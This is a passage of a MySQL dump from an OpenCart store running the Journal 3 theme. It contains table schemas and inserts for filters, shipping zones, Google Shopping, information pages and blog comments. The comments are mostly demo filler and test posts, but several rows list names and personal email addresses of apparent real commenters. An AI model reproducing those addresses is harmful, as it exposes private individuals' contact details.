  `filter_group_id` int(11) NOT NULL,
  `sort_order` int(3) NOT NULL
) ENGINE=MyISAM DEFAULT CHARSET=utf8;

-- --------------------------------------------------------

--
-- Table structure for table `filter_description`
--

CREATE TABLE `filter_description` (
  `filter_id` int(11) NOT NULL,
  `language_id` int(11) NOT NULL,
  `filter_group_id` int(11) NOT NULL,
  `name` varchar(64) NOT NULL
) ENGINE=MyISAM DEFAULT CHARSET=utf8;

-- --------------------------------------------------------

--
-- Table structure for table `filter_group`
--

CREATE TABLE `filter_group` (
  `filter_group_id` int(11) NOT NULL,
  `sort_order` int(3) NOT NULL
) ENGINE=MyISAM DEFAULT CHARSET=utf8;

-- --------------------------------------------------------

--
-- Table structure for table `filter_group_description`
--

CREATE TABLE `filter_group_description` (
  `filter_group_id` int(11) NOT NULL,
  `language_id` int(11) NOT NULL,
  `name` varchar(64) NOT NULL
) ENGINE=MyISAM DEFAULT CHARSET=utf8;

-- --------------------------------------------------------

--
-- Table structure for table `geo_zone`
--

CREATE TABLE `geo_zone` (
  `geo_zone_id` int(11) NOT NULL,
  `name` varchar(32) NOT NULL,
  `description` varchar(255) NOT NULL,
  `date_added` datetime NOT NULL,
  `date_modified` datetime NOT NULL
) ENGINE=MyISAM DEFAULT CHARSET=utf8;

--
-- Dumping data for table `geo_zone`
--

INSERT INTO `geo_zone` (`geo_zone_id`, `name`, `description`, `date_added`, `date_modified`) VALUES
(3, 'UK VAT Zone', 'UK VAT', '2009-01-06 23:26:25', '2010-02-26 22:33:24'),
(4, 'UK Shipping', 'UK Shipping Zones', '2009-06-23 01:14:53', '2010-12-15 15:18:13');

-- --------------------------------------------------------

--
-- Table structure for table `googleshopping_category`
--

CREATE TABLE `googleshopping_category` (
  `google_product_category` varchar(10) NOT NULL,
  `store_id` int(11) NOT NULL DEFAULT 0,
  `category_id` int(11) NOT NULL
) ENGINE=MyISAM DEFAULT CHARSET=utf8;

-- --------------------------------------------------------

--
-- Table structure for table `googleshopping_product`
--

CREATE TABLE `googleshopping_product` (
  `product_advertise_google_id` int(11) UNSIGNED NOT NULL,
  `product_id` int(11) DEFAULT NULL,
  `store_id` int(11) NOT NULL DEFAULT 0,
  `has_issues` tinyint(1) DEFAULT NULL,
  `destination_status` enum('pending','approved','disapproved') NOT NULL DEFAULT 'pending',
  `impressions` int(11) NOT NULL DEFAULT 0,
  `clicks` int(11) NOT NULL DEFAULT 0,
  `conversions` int(11) NOT NULL DEFAULT 0,
  `cost` decimal(15,4) NOT NULL DEFAULT 0.0000,
  `conversion_value` decimal(15,4) NOT NULL DEFAULT 0.0000,
  `google_product_category` varchar(10) DEFAULT NULL,
  `condition` enum('new','refurbished','used') DEFAULT NULL,
  `adult` tinyint(1) DEFAULT NULL,
  `multipack` int(11) DEFAULT NULL,
  `is_bundle` tinyint(1) DEFAULT NULL,
  `age_group` enum('newborn','infant','toddler','kids','adult') DEFAULT NULL,
  `color` int(11) DEFAULT NULL,
  `gender` enum('male','female','unisex') DEFAULT NULL,
  `size_type` enum('regular','petite','plus','big and tall','maternity') DEFAULT NULL,
  `size_system` enum('AU','BR','CN','DE','EU','FR','IT','JP','MEX','UK','US') DEFAULT NULL,
  `size` int(11) DEFAULT NULL,
  `is_modified` tinyint(1) NOT NULL DEFAULT 0
) ENGINE=MyISAM DEFAULT CHARSET=utf8;

-- --------------------------------------------------------

--
-- Table structure for table `googleshopping_product_status`
--

CREATE TABLE `googleshopping_product_status` (
  `product_id` int(11) NOT NULL DEFAULT 0,
  `store_id` int(11) NOT NULL DEFAULT 0,
  `product_variation_id` varchar(64) NOT NULL DEFAULT '',
  `destination_statuses` text NOT NULL,
  `data_quality_issues` text NOT NULL,
  `item_level_issues` text NOT NULL,
  `google_expiration_date` int(11) NOT NULL DEFAULT 0
) ENGINE=MyISAM DEFAULT CHARSET=utf8;

-- --------------------------------------------------------

--
-- Table structure for table `googleshopping_product_target`
--

CREATE TABLE `googleshopping_product_target` (
  `product_id` int(11) NOT NULL,
  `store_id` int(11) NOT NULL DEFAULT 0,
  `advertise_google_target_id` int(11) UNSIGNED NOT NULL
) ENGINE=MyISAM DEFAULT CHARSET=utf8;

-- --------------------------------------------------------

--
-- Table structure for table `googleshopping_target`
--

CREATE TABLE `googleshopping_target` (
  `advertise_google_target_id` int(11) UNSIGNED NOT NULL,
  `store_id` int(11) NOT NULL DEFAULT 0,
  `campaign_name` varchar(255) NOT NULL DEFAULT '',
  `country` varchar(2) NOT NULL DEFAULT '',
  `budget` decimal(15,4) NOT NULL DEFAULT 0.0000,
  `feeds` text NOT NULL,
  `status` enum('paused','active') NOT NULL DEFAULT 'paused',
  `date_added` date DEFAULT NULL,
  `roas` int(11) NOT NULL DEFAULT 0
) ENGINE=MyISAM DEFAULT CHARSET=utf8;

-- --------------------------------------------------------

--
-- Table structure for table `information`
--

CREATE TABLE `information` (
  `information_id` int(11) NOT NULL,
  `bottom` int(1) NOT NULL DEFAULT 0,
  `sort_order` int(3) NOT NULL DEFAULT 0,
  `status` tinyint(1) NOT NULL DEFAULT 1
) ENGINE=MyISAM DEFAULT CHARSET=utf8;

--
-- Dumping data for table `information`
--

INSERT INTO `information` (`information_id`, `bottom`, `sort_order`, `status`) VALUES
(3, 1, 3, 1),
(4, 1, 1, 1),
(5, 1, 4, 1),
(6, 1, 2, 1),
(7, 0, 0, 1);

-- --------------------------------------------------------

--
-- Table structure for table `information_description`
--

CREATE TABLE `information_description` (
  `information_id` int(11) NOT NULL,
  `language_id` int(11) NOT NULL,
  `title` varchar(64) NOT NULL,
  `description` mediumtext NOT NULL,
  `meta_title` varchar(255) NOT NULL,
  `meta_description` varchar(255) NOT NULL,
  `meta_keyword` varchar(255) NOT NULL
) ENGINE=MyISAM DEFAULT CHARSET=utf8;

--
-- Dumping data for table `information_description`
--

INSERT INTO `information_description` (`information_id`, `language_id`, `title`, `description`, `meta_title`, `meta_description`, `meta_keyword`) VALUES
(5, 1, 'Terms &amp; Conditions', '&lt;p&gt;\r\n	Terms &amp;amp; Conditions&lt;/p&gt;\r\n', 'Terms &amp; Conditions', '', ''),
(6, 2, '配送信息', '&lt;p&gt;\r\n	配送信息&lt;/p&gt;\r\n', '配送信息', '配送信息', '配送信息'),
(7, 2, '常見問題', '&lt;p&gt;常見問題&lt;br&gt;&lt;/p&gt;', '常見問題', '常見問題', '常見問題'),
(4, 2, '關於我們', '&lt;p&gt;&lt;span class=&quot;drop-cap&quot;&gt;S&lt;/span&gt;ince 2013, Journal has been the best selling and most loved OpenCart theme on the market. Now at version 3, it brings many new and revolutionary features such as an advanced page builder with 30+ multi-purpose modules that can be added on any page in any grid layout configuration, as well as the best possible customizable options for any area of your store.&lt;/p&gt;&lt;blockquote&gt;Journal has the impressive rating of 4.9 from more than 2000 ratings.&lt;/blockquote&gt;&lt;p&gt;Journal 3 also comes with fully customizable CSS options with the added possibility of setting each option differently on any breakpoint. This breakthrough feature will greatly enhance your design skills and allow you to create pixel perfect layouts at any screen width.&lt;/p&gt;&lt;p&gt;The new advanced Status mechanism allow you to set up modules and menus based on device, customer login status or customer groups.&lt;br&gt;&lt;/p&gt;&lt;blockquote&gt;98% satisfaction rate within our more than 19,000 customers.&lt;/blockquote&gt;&lt;p&gt;The new Schedule feature&amp;nbsp;allows you to display any module at specific dates in the future, or to disable any module automatically at a certain time and date. Imagine the possibilities and peace of mind...designing your promotional banners or sliders, or entire product modules that only show up on specific dates and are disabled automatically whenever you don\'t need them anymore.&amp;nbsp;&lt;/p&gt;&lt;p&gt;These are just a few of the outstanding features available in the new Journal 3 framework, there are so many new options and possibilities that it will takes us a very long time to list them all.&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;a class=&quot;btn&quot; href=&quot;https://themeforest.net/item/journal-advanced-opencart-theme/4260361&quot; target=&quot;_blank&quot;&gt;Buy Journal&lt;/a&gt;&lt;/p&gt;', '關於我們', '關於我們', '關於我們'),
(7, 1, 'Frequently Asked Questions', '&lt;p&gt;&lt;br&gt;&lt;/p&gt;&lt;p&gt;&lt;br&gt;&lt;/p&gt;', 'Frequently Asked Questions', '', ''),
(6, 1, 'Delivery Information', '&lt;p&gt;\r\n	Delivery Information&lt;/p&gt;\r\n', 'Delivery Information', '', ''),
(4, 1, 'About Us', '&lt;p&gt;&lt;span class=&quot;drop-cap&quot;&gt;S&lt;/span&gt;ince 2013, &lt;a href=&quot;#test&quot;&gt;Journal&lt;/a&gt; has been the best selling and most loved OpenCart theme on the market. Now at version 3, it brings many new and revolutionary features such as an advanced page builder with 30+ multi-purpose modules that can be added on any page in any grid layout configuration, as well as the best possible customizable options for any area of your store.&lt;/p&gt;&lt;blockquote&gt;Journal has the impressive rating of 4.9 from more than 2000 ratings.&lt;/blockquote&gt;&lt;p&gt;Journal 3 also comes with fully customizable CSS options with the added possibility of setting each option differently on any breakpoint. This breakthrough feature will greatly enhance your design skills and allow you to create pixel perfect layouts at any screen width.&lt;/p&gt;&lt;p&gt;The new advanced Status mechanism allow you to set up modules and menus based on device, customer login status or customer groups.&lt;br&gt;&lt;/p&gt;&lt;blockquote&gt;98% satisfaction rate within our more than 19,000 customers.&lt;/blockquote&gt;&lt;p&gt;The new Schedule feature&amp;nbsp;allows you to display any module at specific dates in the future, or to disable any module automatically at a certain time and date. Imagine the possibilities and peace of mind...designing your promotional banners or sliders, or entire product modules that only show up on specific dates and are disabled automatically whenever you don\'t need them anymore.&amp;nbsp;&lt;/p&gt;&lt;p&gt;These are just a few of the outstanding features available in the new Journal 3 framework, there are so many new options and possibilities that it will takes us a very long time to list them all.&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;a class=&quot;btn&quot; href=&quot;https://themeforest.net/item/journal-advanced-opencart-theme/4260361&quot; target=&quot;_blank&quot;&gt;Buy Journal&lt;/a&gt;&lt;/p&gt;\r\n\r\n', 'About Us', '', ''),
(5, 2, 'Terms &amp; Conditions', '&lt;p&gt;\r\n	Terms &amp;amp; Conditions&lt;/p&gt;\r\n', 'Terms &amp; Conditions', '', ''),
(3, 1, 'Privacy Policy', '&lt;p&gt;\r\n	Privacy Policy&lt;/p&gt;\r\n', 'Privacy Policy', '', ''),
(3, 2, '私隱政策', '&lt;p&gt;&lt;a href=&quot;https://www.techgear2.com/index.php?route=information/information&amp;amp;information_id=3&quot; style=&quot;background-color: rgb(27, 27, 27); color: rgb(113, 155, 252); touch-action: manipulation; display: inline-flex; -webkit-box-align: center; align-items: center; transition: all 0.08s ease-out 0s; position: relative; width: inherit; justify-content: flex-start; padding-bottom: 5px; font-family: &amp;quot;IBM Plex Sans&amp;quot;; font-size: 16px;&quot;&gt;&lt;span class=&quot;links-text&quot; style=&quot;color: rgb(118, 114, 114);&quot;&gt;私隱政策&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;\r\n', '私隱政策', '私隱政策', '私隱政策');

-- --------------------------------------------------------

--
-- Table structure for table `information_to_layout`
--

CREATE TABLE `information_to_layout` (
  `information_id` int(11) NOT NULL,
  `store_id` int(11) NOT NULL,
  `layout_id` int(11) NOT NULL
) ENGINE=MyISAM DEFAULT CHARSET=utf8;

--
-- Dumping data for table `information_to_layout`
--

INSERT INTO `information_to_layout` (`information_id`, `store_id`, `layout_id`) VALUES
(4, 0, 0),
(7, 0, 21),
(3, 0, 0),
(6, 0, 0);

-- --------------------------------------------------------

--
-- Table structure for table `information_to_store`
--

CREATE TABLE `information_to_store` (
  `information_id` int(11) NOT NULL,
  `store_id` int(11) NOT NULL
) ENGINE=MyISAM DEFAULT CHARSET=utf8;

--
-- Dumping data for table `information_to_store`
--

INSERT INTO `information_to_store` (`information_id`, `store_id`) VALUES
(3, 0),
(4, 0),
(5, 0),
(6, 0),
(7, 0);

-- --------------------------------------------------------

--
-- Table structure for table `journal3_blog_category`
--

CREATE TABLE `journal3_blog_category` (
  `category_id` int(11) NOT NULL,
  `parent_id` int(11) DEFAULT NULL,
  `image` varchar(256) DEFAULT NULL,
  `status` tinyint(1) DEFAULT NULL,
  `sort_order` int(11) DEFAULT NULL
) ENGINE=MyISAM DEFAULT CHARSET=utf8;

--
-- Dumping data for table `journal3_blog_category`
--

INSERT INTO `journal3_blog_category` (`category_id`, `parent_id`, `image`, `status`, `sort_order`) VALUES
(2, 0, '', 1, 0),
(3, 0, '', 1, 0),
(4, 0, '', 1, 0),
(5, 0, '', 1, 5);

-- --------------------------------------------------------

--
-- Table structure for table `journal3_blog_category_description`
--

CREATE TABLE `journal3_blog_category_description` (
  `category_id` int(11) NOT NULL,
  `language_id` int(11) NOT NULL,
  `name` varchar(256) DEFAULT NULL,
  `description` mediumtext DEFAULT NULL,
  `meta_title` varchar(256) DEFAULT NULL,
  `meta_keywords` varchar(256) DEFAULT NULL,
  `meta_description` text DEFAULT NULL,
  `keyword` varchar(256) DEFAULT NULL
) ENGINE=MyISAM DEFAULT CHARSET=utf8;

--
-- Dumping data for table `journal3_blog_category_description`
--

INSERT INTO `journal3_blog_category_description` (`category_id`, `language_id`, `name`, `description`, `meta_title`, `meta_keywords`, `meta_description`, `keyword`) VALUES
(2, 1, 'Shopping', '', '', '', '', 'shopping'),
(3, 1, 'Traveling', '', '', '', '', 'traveling'),
(4, 1, 'Branding', '', '', '', '', 'branding'),
(5, 1, 'New Products', '', '', '', '', 'new-products');

-- --------------------------------------------------------

--
-- Table structure for table `journal3_blog_category_to_layout`
--

CREATE TABLE `journal3_blog_category_to_layout` (
  `category_id` int(11) NOT NULL,
  `store_id` int(11) NOT NULL,
  `layout_id` int(11) DEFAULT NULL
) ENGINE=MyISAM DEFAULT CHARSET=utf8;

-- --------------------------------------------------------

--
-- Table structure for table `journal3_blog_category_to_store`
--

CREATE TABLE `journal3_blog_category_to_store` (
  `category_id` int(11) DEFAULT NULL,
  `store_id` int(11) DEFAULT NULL
) ENGINE=MyISAM DEFAULT CHARSET=utf8;

--
-- Dumping data for table `journal3_blog_category_to_store`
--

INSERT INTO `journal3_blog_category_to_store` (`category_id`, `store_id`) VALUES
(2, 0),
(3, 0),
(4, 0),
(5, 0);

-- --------------------------------------------------------

--
-- Table structure for table `journal3_blog_comments`
--

CREATE TABLE `journal3_blog_comments` (
  `comment_id` int(11) NOT NULL,
  `parent_id` int(11) DEFAULT NULL,
  `post_id` int(11) DEFAULT NULL,
  `customer_id` int(11) DEFAULT NULL,
  `author_id` int(11) DEFAULT NULL,
  `name` varchar(256) DEFAULT NULL,
  `email` varchar(256) DEFAULT NULL,
  `website` varchar(256) DEFAULT NULL,
  `comment` text DEFAULT NULL,
  `status` tinyint(1) DEFAULT NULL,
  `date` datetime DEFAULT NULL
) ENGINE=MyISAM DEFAULT CHARSET=utf8;

--
-- Dumping data for table `journal3_blog_comments`
--

INSERT INTO `journal3_blog_comments` (`comment_id`, `parent_id`, `post_id`, `customer_id`, `author_id`, `name`, `email`, `website`, `comment`, `status`, `date`) VALUES
(1, 0, 1, 0, 1, 'Michael', 'support@digital-atelier.com', '', 'I must say, the Journal Blog is a fantastic addition to an already outstanding theme. Keep up the good work guys, it\'s amazing what you come up with for the Opencart community.', 1, '2014-09-15 12:08:31'),
(2, 0, 1, 0, 1, 'Alex', 'journal@digital-atelier.com', '', 'Lorem ipsum dolor sit amet, consectetur adipiscing elit. Aliquam iaculis egestas laoreet. Etiam faucibus massa sed risus lacinia in vulputate dolor imperdiet. Curabitur pharetra, purus a commodo dignissim, sapien nulla tempus nisi, et varius nulla urna at arcu.', 1, '2014-09-15 12:08:54'),
(3, 0, 1, 0, 1, 'Kostas', 'hello@digital-atelier.com', '', 'Lorem ipsum dolor sit amet, consectetur adipiscing elit. Aliquam iaculis egestas laoreet. Etiam faucibus massa sed risus lacinia in vulputate dolor imperdiet. Curabitur pharetra, purus a commodo dignissim, sapien nulla tempus nisi, et varius nulla urna at arcu.', 1, '2014-09-15 12:10:22'),
(4, 3, 1, 0, 1, 'Admin', 'admin@digital-atelier.com', '', 'Lorem ipsum dolor sit amet, consectetur adipiscing elit. Aliquam iaculis egestas laoreet. Etiam faucibus massa sed risus lacinia in vulputate dolor imperdiet. Curabitur pharetra, purus a commodo dignissim, sapien nulla tempus nisi, et varius nulla urna at arcu.', 1, '2014-09-15 12:10:58'),
(7, 3, 1, 0, 1, 'Mike', 'journal@digital-atelier.com', '', 'Lorem ipsum dolor sit amet, consectetur adipiscing elit. Aliquam iaculis egestas laoreet. Etiam faucibus massa sed risus lacinia in vulputate dolor imperdiet. Curabitur pharetra, purus a commodo dignissim, sapien nulla tempus nisi, et varius nulla urna at arcu. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Aliquam iaculis egestas laoreet. Etiam faucibus massa sed risus lacinia in vulputate dolor imperdiet. Curabitur pharetra, purus a commodo dignissim, sapien nulla tempus nisi, et varius nulla urna at arcu. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Aliquam iaculis egestas laoreet. Etiam faucibus massa sed risus lacinia in vulputate dolor imperdiet. Curabitur pharetra, purus a commodo dignissim, sapien nulla tempus nisi, et varius nulla urna at arcu.', 1, '2014-10-24 21:42:43'),
(8, 3, 1, 0, 1, 'Rodriguez', 'hello@digital-atelier.com', '', 'Lorem ipsum dolor sit amet, consectetur adipiscing elit. Aliquam iaculis egestas laoreet.', 1, '2014-10-24 21:43:29'),
(9, 0, 1, 0, 1, 'Mikka', 'admin@digital-atelier.com', '', 'Lorem ipsum dolor sit amet, consectetur adipiscing elit. Aliquam iaculis egestas laoreet. Etiam faucibus massa sed risus lacinia in vulputate dolor imperdiet. Curabitur pharetra, purus a commodo dignissim, sapien nulla tempus nisi, et varius nulla urna at arcu. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Aliquam iaculis egestas laoreet. Etiam faucibus massa sed risus lacinia in vulputate dolor imperdiet. Curabitur pharetra, purus a commodo dignissim, sapien nulla tempus nisi, et varius nulla urna at arcu.', 1, '2014-10-24 21:50:26'),
(10, 3, 1, 0, 1, 'Amber', 'noreply@digital-atelier.com', '', 'Lorem ipsum dolor sit amet, consectetur adipiscing elit. Aliquam iaculis egestas laoreet. Etiam faucibus massa sed risus lacinia in vulputate dolor imperdiet. Curabitur pharetra, purus a commodo dignissim, sapien nulla tempus nisi, et varius nulla urna at arcu.', 1, '2014-10-24 21:55:25'),
(11, 3, 1, 0, 1, 'Jenny', 'admin@digital-atelier.com', '', 'Lorem ipsum dolor sit amet, consectetur adipiscing elit. Aliquam iaculis egestas laoreet. Etiam faucibus massa sed risus lacinia in vulputate dolor imperdiet. Curabitur pharetra, purus a commodo dignissim, sapien nulla tempus nisi, et varius nulla urna at arcu.', 1, '2014-10-24 21:58:33'),
(12, 0, 1, 0, 1, 'Ben', 'journal@digital-atelier.com', '', 'Lorem ipsum dolor sit amet, consectetur adipiscing elit. Aliquam iaculis egestas laoreet. Etiam faucibus massa sed risus lacinia in vulputate dolor imperdiet. Curabitur pharetra, purus a commodo dignissim, sapien nulla tempus nisi, et varius nulla urna at arcu.', 0, '2014-10-24 22:02:23'),
(13, 2, 1, 0, 1, 'Jay', 'hello@digital-atelier.com', '', 'Lorem ipsum dolor sit amet, consectetur adipiscing elit. Aliquam iaculis egestas laoreet. Etiam faucibus massa sed risus lacinia in vulputate dolor imperdiet. Curabitur pharetra, purus a commodo dignissim, sapien nulla tempus nisi, et varius nulla urna at arcu.', 0, '2014-10-24 22:02:42'),
(14, 2, 1, 0, 1, 'Steve', 'support@digital-atelier.com', '', 'Lorem ipsum dolor sit amet, consectetur adipiscing elit. Aliquam iaculis egestas laoreet.', 1, '2014-10-24 22:04:38'),
(15, 2, 1, 0, 1, 'Cassandra', 'admin@digital-atelier.com', '', 'Lorem ipsum dolor sit amet, consectetur adipiscing elit. Aliquam iaculis egestas laoreet.', 1, '2014-10-24 22:05:47'),
(16, 1, 1, 0, 1, 'Jenny', 'info@digital-atelier.com', '', 'I completely agree. The best possible feature set you can find in any Opencart theme. And I love the Gravatar support for comments, so cool! Keep it up guys!', 1, '2014-10-24 22:06:05'),
(80, 0, 3, 0, 3, 'kjk', 'fakie@gmail.com', 'kalsfdjAKSDF', 'SKDF', 0, '2014-11-04 06:12:25'),
(18, 3, 1, 0, 1, 'Ella', 'journa@digital-atelier.com', '', 'Lorem ipsum dolor sit amet.', 1, '2014-10-24 22:10:55'),
(81, 0, 4, 0, 0, 'Soffie', 'jnjnjn@jnjn.com', '', 'Lorem ipsum dolor sit amet, consectetur adipiscing elit. Aliquam iaculis egestas laoreet. Etiam faucibus massa sed risus lacinia in vulputate dolor imperdiet.', 0, '2014-11-04 15:08:28'),
(26, 0, 3, 0, 1, 'Alex', 'journal@digital-atelier.com', '', 'Lorem ipsum dolor sit amet, consectetur adipiscing elit. Aliquam iaculis egestas laoreet. Etiam faucibus massa sed risus lacinia in vulputate dolor imperdiet. Curabitur pharetra, purus a commodo dignissim, sapien nulla tempus nisi, et varius nulla urna at arcu.', 1, '2014-09-15 12:08:54'),
(27, 0, 3, 0, 1, 'Kostas', 'hello@digital-atelier.com', '', 'Lorem ipsum dolor sit amet, consectetur adipiscing elit. Aliquam iaculis egestas laoreet. Etiam faucibus massa sed risus lacinia in vulputate dolor imperdiet. Curabitur pharetra, purus a commodo dignissim, sapien nulla tempus nisi, et varius nulla urna at arcu.', 1, '2014-09-15 12:10:22'),
(31, 0, 3, 0, 1, 'Michael', 'support@digital-atelier.com', '', 'I must say, the Journal Blog is a fantastic addition to an already outstanding theme. Keep up the good work guys, it\'s amazing what you come up with for the Opencart community.', 1, '2014-09-15 12:08:31'),
(77, 0, 1, 0, 0, 'kjklj', 'kljkl@fds.sk', 'ss', 'Lorem ipsum', 0, '2014-11-03 23:53:11'),
(78, 0, 1, 0, 0, 'abc', 'abc@abc.ab', '', 'comment', 0, '2014-11-04 00:27:00'),
(73, 37, 4, 0, 1, 'Sandra', 'info@digital-atelier.com', '', 'Super Theme, I\'m going to buy it for my handmade jewellery store.', 1, '2014-11-03 15:21:51'),
(37, 0, 4, 0, 1, 'Michael', 'support@digital-atelier.com', '', 'I must say, the Journal Blog is a fantastic addition to an already outstanding theme. Keep up the good work guys, it\'s amazing what you come up with for the Opencart community.', 1, '2014-09-15 12:08:31'),
(38, 0, 4, 0, 1, 'Alex', 'journal@digital-atelier.com', '', 'Lorem ipsum dolor sit amet, consectetur adipiscing elit. Aliquam iaculis egestas laoreet. Etiam faucibus massa sed risus lacinia in vulputate dolor imperdiet. Curabitur pharetra, purus a commodo dignissim, sapien nulla tempus nisi, et varius nulla urna at arcu.', 1, '2014-09-15 12:08:54'),
(55, 0, 7, 0, 1, 'Michael', 'support@digital-atelier.com', 'https://www.journal-theme.com/', 'I must say, the Journal Blog is a fantastic addition to an already outstanding theme. Keep up the good work guys, it\'s amazing what you come up with for the Opencart community.', 1, '2014-09-15 12:08:31'),
(59, 0, 7, 0, 1, 'Ben', 'journal@digital-atelier.com', '', 'Lorem ipsum dolor sit amet, consectetur adipiscing elit. Aliquam iaculis egestas laoreet. Etiam faucibus massa sed risus lacinia in vulputate dolor imperdiet. Curabitur pharetra, purus a commodo dignissim, sapien nulla tempus nisi, et varius nulla urna at arcu.', 0, '2014-10-24 22:02:23'),
(61, 0, 8, 0, 1, 'Michael', 'support@digital-atelier.com', '', 'I must say, the Journal Blog is a fantastic addition to an already outstanding theme. Keep up the good work guys, it\'s amazing what you come up with for the Opencart community.', 1, '2014-09-15 12:08:31'),
(62, 0, 8, 0, 1, 'Alex', 'journal@digital-atelier.com', '', 'Lorem ipsum dolor sit amet, consectetur adipiscing elit. Aliquam iaculis egestas laoreet. Etiam faucibus massa sed risus lacinia in vulputate dolor imperdiet. Curabitur pharetra, purus a commodo dignissim, sapien nulla tempus nisi, et varius nulla urna at arcu.', 1, '2014-09-15 12:08:54'),
(65, 0, 8, 0, 1, 'Ben', 'journal@digital-atelier.com', '', 'Lorem ipsum dolor sit amet, consectetur adipiscing elit. Aliquam iaculis egestas laoreet. Etiam faucibus massa sed risus lacinia in vulputate dolor imperdiet. Curabitur pharetra, purus a commodo dignissim, sapien nulla tempus nisi, et varius nulla urna at arcu.', 0, '2014-10-24 22:02:23'),
(82, 0, 1, 51, 0, 'Dimitar Bozhilov', 'dimitarbozhilov@live.com', 'www.suhstroi.com', 'Test', 1, '2014-11-05 09:08:50'),
(83, 0, 1, 0, 0, 'Ryan', 'ry@hi.com', 'www.test.com', 'Lorem ipsum dolor sit amet, consectetur adipiscing elit. Aliquam iaculis egestas laoreet. Etiam faucibus massa sed risus lacinia in vulputate dolor imperdiet. Curabitur pharetra, purus a commodo dignissim, sapien nulla tempus nisi, et varius nulla urna at arcu. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Aliquam iaculis egestas laoreet. Etiam faucibus massa sed risus lacinia in vulputate dolor imperdiet. Curabitur pharetra, purus a commodo dignissim, sapien nulla tempus nisi, et varius nulla urna at arcu. - See more at: http://journal.digital-atelier.com/1/journal-blog#sthash.ZlU5jnKb.dpuf', 0, '2014-11-06 21:22:13'),
(84, 37, 4, 0, 0, 'Peter', 'petedrennan@hotmail.com', 'nerocigs.com', 'Yea, this really is a nice addition to the theme. Fantastic work guys.', 0, '2014-11-07 20:23:55'),
(85, 0, 1, 0, 0, 'ga', 'filtr@ALICE.IT', '', 'DSDADASDA', 0, '2014-11-07 23:56:16'),
(87, 0, 4, 0, 0, 'amin', 'a.mozaman@gmail.com', '', 'Lorem ipsum dolor sit amet, consectetur adipiscing elit. - See more at: http://journal.digital-atelier.com/1/another-blog-post#sthash.N1qRDgM8.dpuf', 0, '2014-11-10 18:15:50'),
(88, 0, 1, 0, 0, 'Yury', '1234@kffg.ru', '', 'test2', 0, '2014-11-11 09:52:46'),
(89, 0, 1, 0, 3, 'vbvc', 'bvcbcv@ffdd.com', 'vcbc', 'vbcbvvc', 0, '2014-11-20 14:00:40'),
(90, 0, 1, 0, 3, 'dfgdfgd', 'dfgdg@dfgdf.com', 'dfgdf', 'gdfgdfg', 0, '2014-11-20 14:00:53'),
(91, 0, 1, 0, 3, 'fgdg', 'vxcv@gdf.com', 'fdgdfg', 'dfgdf', 0, '2014-11-20 14:01:35'),
(93, 0, 1, 0, 0, 'Pesho', 'vanio2121@gmail.com', 'Pesho', 'Test', 0, '2014-11-22 00:00:36'),
(94, 0, 1, 0, 3, 'daniel', 'mtl@yahoo.ca', '', 'test', 0, '2014-11-24 17:17:06'),
(96, 0, 1, 0, 0, 'Pudom', 'oudom.net@gmail.com', 'www.nokortech.com', '-Journal Blog is a lot better than my expected...\r\nThanks DigitalAtelier', 0, '2014-11-25 22:20:49'),
(97, 0, 1, 0, 0, 'Patrick From Perfect-Body', 'patrick_s@adr.dk', 'http://perfect-body.dk', 'Very cool, I almost bought a new module just so i could get the blog on my website. I am now updating my Journal theme so i can get this. It looks very nice and smooth :) Thanks guys. I also added my mysite, just to test and see if the comments are nofollow links, which i want on my site. http://perfect-body.dk', 1, '2014-12-20 16:12:31'),
(98, 0, 1, 0, 3, 'Kirill', 'midean@mail.ru', '', 'i need avatar!', 0, '2015-01-20 12:48:39'),
(99, 0, 1, 0, 3, 'binhmeo', 'binhmeo1987@yahoo.com', '', 'yitfiytfiytf', 0, '2015-01-21 16:15:27'),
(100, 0, 1, 0, 1, 'Costas', 'journal@digital-atelier.com', 'www.digital-atelier.com', 'Lorem ipsum dolor sit amet.', 1, '2015-01-24 14:19:58'),
(101, 0, 4, 0, 0, 'Harry', 'poriyaharesh@gmail.com', 'poriyasoftwares.com', 'Feb Blog Module', 0, '2015-01-27 20:25:00'),
(102, 0, 4, 0, 0, 'aaaaaaaaaaaaaaa', '3082k@naver.com', '', 'hhhhhhhhhhhhhhhhhhhhh', 0, '2015-01-29 14:32:39'),
(103, 0, 1, 0, 0, 'deneme', 'bulentdinler@gmail.com', 'sdfdfsfsfd.com', 'sdfasfdasdf sdfa f', 0, '2015-01-30 13:36:51'),
(104, 0, 1, 0, 0, 'sdfsdf', 'sadfasfd@sddf.sdf', 'sfasfasf', 'sfasfas sdf asdfasf', 0, '2015-01-30 13:37:08'),
(105, 9, 1, 0, 0, 'Don Bell', 'dannym65@yahoo.com', 'd', 'nice', 0, '2015-02-10 21:38:41'),
(106, 1, 1, 0, 0, 'vuthea', 'chheangvuthea1@gmail.com', 'www.kh4it.com', 'Nice blog', 0, '2015-02-13 17:31:18'),
(107, 0, 3, 0, 0, 'Test', 'tst@tst.tst', '', 'test', 0, '2015-02-26 17:18:44'),
(108, 0, 3, 0, 0, 'damian', 'sac@hotmail.com', 'ste', 'Hi', 0, '2015-02-28 01:13:13'),
(110, 1, 1, 0, 0, 'Antonio', 'ndroid@hotmail.it', '', 'Very good blog', 0, '2015-03-14 15:35:00'),
(114, 38, 4, 0, 0, 'Test', 'test@gg.vom', 'www.grrr.com', 'fsdf sdfsd fsdf sdf', 0, '2015-04-18 18:11:42'),
(115, 0, 1, 0, 0, 'Serdar Bulut', 'ddrsty_@hotmail.com', '', 'test comment', 0, '2015-04-18 23:57:19'),
(116, 0, 1, 0, 3, 'test', 'demo@se.se', 'fds', 'test', 0, '2015-04-23 22:48:57'),
(117, 0, 1, 0, 0, 'test', 'kedaiku2020@gmail.com', 'test', 'test', 0, '2015-05-10 08:51:26'),
(118, 1, 1, 0, 3, 'Asdasd asd', 'Asdasdasd@asd.it', '', 'asd', 0, '2015-07-15 17:01:15'),
(120, 1, 1, 0, 0, 'aaa', 'ddd@fff.com', '', 'ely agree. The best possible feature set you can find in any Opencart theme. And I love the Gravatar - See more at: http://journal.digital-atelier.com/1/blog/journal-blog#sthash.kYGVwToP.dpuf', 0, '2015-08-10 06:07:40'),
